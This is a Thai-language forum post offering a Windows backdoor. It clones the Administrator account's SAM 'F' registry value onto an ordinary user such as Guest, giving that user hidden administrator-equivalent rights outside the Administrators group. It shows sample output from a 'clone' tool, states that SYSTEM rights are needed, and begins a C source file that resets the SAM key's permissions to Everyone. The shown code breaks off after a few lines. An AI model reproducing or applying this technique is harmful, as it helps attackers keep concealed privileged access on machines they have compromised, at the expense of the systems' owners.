เป็นการทำ backdoor บน Windows ให้ user ธรรมดาี่มีสิทธิเทียบเท่า Administrator โดย user นี้จะไม่อยู่ใน member ของ local Administrators group
มี code (C program) มาฝากด้วย compile เองละกัน:
C:\>clone Guest Administrator
SAM\SAM\Domains\Account\Users\000001F5 ==> Guest
SAM\SAM\Domains\Account\Users\000001F4 ==> Administrator
Clone Guest as Administrator success -
[hide=20]
วิธีการ
แก้ไขค่า registry SAM\\SAM\\Domains\\Account\\Users\\00000%X และแก้ไขค่า F values ของ user ธรรมดา ให้เหมือนกับ ของ Administrator แค่นี้เอง (ต้องใช้ SYSTEM account)
clone.c
[code]
#include <windows.h>
#include <stdio.h>
#include <aclapi.h>
#pragma comment(lib, "advapi32.lib")
LPTSTR lpObjectName = "MACHINE\\SAM\\SAM";
SE_OBJECT_TYPE ObjectType = SE_REGISTRY_KEY; //#include <aclapi.h>
PACL OldDACL, NewDACL;
PSECURITY_DESCRIPTOR SD;
EXPLICIT_ACCESS ea;
int KeyN=0;
// 设置注册表的存取权限为everyone
BOOL EnablePrivilege()
{
//下面是设置SAM键的权限为everyone:
//默认返回值为FALSE
BOOL bRet = FALSE;
Reply With Quote
